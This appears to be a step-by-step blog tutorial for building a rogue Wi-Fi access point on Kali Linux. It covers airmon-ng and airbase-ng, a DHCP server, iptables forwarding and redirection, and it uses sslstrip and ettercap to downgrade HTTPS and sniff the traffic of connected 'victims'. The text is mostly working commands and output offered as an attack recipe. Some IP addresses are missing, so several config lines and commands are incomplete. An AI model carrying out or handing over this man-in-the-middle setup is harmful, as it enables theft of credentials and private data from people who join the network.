Create a fake wifi access point and monitor all the traffic that comes through.


Windows 7 host and Kali linux VM. The host can be any operating system. The Kali linux must have access to the internet.


Wifi Adapter which supports monitor mode. mine is Edimax EW7711USn.


The Victim connect to the Virtual access point which passes the traffic through the attacher PC via the USB Wifi Hotspot. using ettercap to sniff and sslstrip to overcome https, the packets are logged and rerouted to the interface connected to the internet.


  1. Install WICD: WICD  is an open source wired and wireless network manager for Linux which aims to provide a simple interface to connect to networks with a wide variety of settings.
    root@hesham: ~#apt - get install wicd

    keep pressing YES untill the install is finished.
    in order to load the manager, in the terminal, run the command:

    root@hesham:~# wicd-client


  2. Connect your Kali VM Network interface in bridged mode by going to VM->Settings and select the Bridged mode option as shown below:vm2
  3. After configuring the network connection for the VM, now lets get the gateway by running the command route -n
    root@hesham:~# route -n
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags Metric Ref    Use Iface         UG    0      0        0 eth1   U     0      0        0 eth0   U     0      0        0 eth1

    My Machine gateway is We are going to use the gateway with the DHCP server that we are going to install in the next step.

  4. Install DHCP Server by running the next command:
    @hesham:~# apt-get install dhcp3-server

    After that, configure the DHCP Server in the file /etc/dhcpd.conf. in case the file was not empty for some reason, remove what there and fill it with the next content.

    root@hesham:~# nano /etc/dhcpd.conf
    default-lease-time 600;
    max-lease-time 7200;
    subnet netmask {
    option routers;
    option subnet-mask;
    option domain-name "HeshamWifi";
    option domain-name-servers;

    Save the file by prexxing Ctl+X+Y+Enterץ
    Notice that you can select any legal DHCP domain you like.

  5. Connect the Wifi Adapter now it must support monitor mode. Mine is Edimax EW-7711USn and run the command airmon-ng to list the monitor device.
    root@hesham:~# airmon-ng 
    Interface	Chipset		Driver
    wlan1		Ralink RT2870/3070	rt2800usb - [phy0]

    wlan1, is our interface.

  6. Now we are going to start the interface wlan1 in monitor mode as shown below
    root@hesham:~# airmon-ng start wlan1
    Found 5 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    PID	Name
    2568	NetworkManager
    2695	dhclient
    6431	dhclient
    11410	wpa_supplicant
    11473	dhclient
    Process with PID 11473 (dhclient) is running on interface wlan1
    Interface	Chipset		Driver
    wlan1		Ralink RT2870/3070	rt2800usb - [phy0]
    				(monitor mode enabled on mon0)

    The NetworkManager and wpa_supplicant are not good to us since they use the monitor mode of the interface, so kill them by running

    root@hesham:~# kill 2568
    root@hesham:~# kill 11410

    Please notice that the monitor mode is enabled on mon0.

  7. Now is time to create our fake wifi: Since I am working with the 802.11b wifi, the channel must be between 1 and 14. i choose 11.
    root@hesham:~# airbase-ng -c 11 -e HeshamWifi mon0
    02:39:23  Created tap interface at0
    02:39:23  Trying to set MTU on at0 to 1500
    02:39:23  Trying to set MTU on mon0 to 1800
    02:39:23  Access Point with BSSID 80:1F:02:F7:6D:C5 started.

    Don’t close that terminal, or the wifi will be disconnected. please open a new terminal in order to continue the configuration.
    Notice that the Wifi is up and running, However, some tunneling adjustments must be done in order for the connected victim to reach the internet. follow that on the next steps.

  8. Now lets configure the new created virtual interface named at0 as shown below
    ifconfig at0 netmask

    after that, lets give the interface a high MTU so there won’t be packet fragment so the victim will enjoy a fast and comfortable trap. However, the airobase-ng will assign a new value to at0 and mon0.

    ifconfig at0 mtu 1400

    Now lets add a Gateway for at0

    route add -net netmask gw

    create IP4 forwarding so the victim can use the internet

    echo 1 > /proc/sys/net/ipv4/ip_forward

    In case that the interface which is connected to the internet is eth1 and the interface that is used for tunneling is at0, the iptables will be configured as follows:

    iptables -t nat -A PREROUTING -p udp -j DNAT --to
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    Now lets make the DHCP Server to listen on at0:

    root@hesham:~# dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    	Internet Systems Consortium DHCP Server 4.2.4
    	Copyright 2004-2012 Internet Systems Consortium.
    	All rights reserved.
    	For info, please visit https://www.isc.org/software/dhcp/
    	Wrote 0 leases to leases file.
    	Listening on LPF/at0/80:1f:02:f7:6d:c5/
    	Sending on   LPF/at0/80:1f:02:f7:6d:c5/
    	Sending on   Socket/fallback/fallback-net

    Start the dhcp server: Notice you may get error telling that the dhcpd,conf is not found. in this case copy the file from /etc/dhcpd.conf to /etc/dhcp/dhcpd.conf.

    root@hesham:~# /etc/init.d/isc-dhcp-server start
          [ ok ] Starting ISC DHCP server: dhcpd.

    Now Run SSL STRIP

    sslstrip -f -p -k 10000

    Start ETTERCAP For Sniffing

    ettercap -p -u -T -q -i at0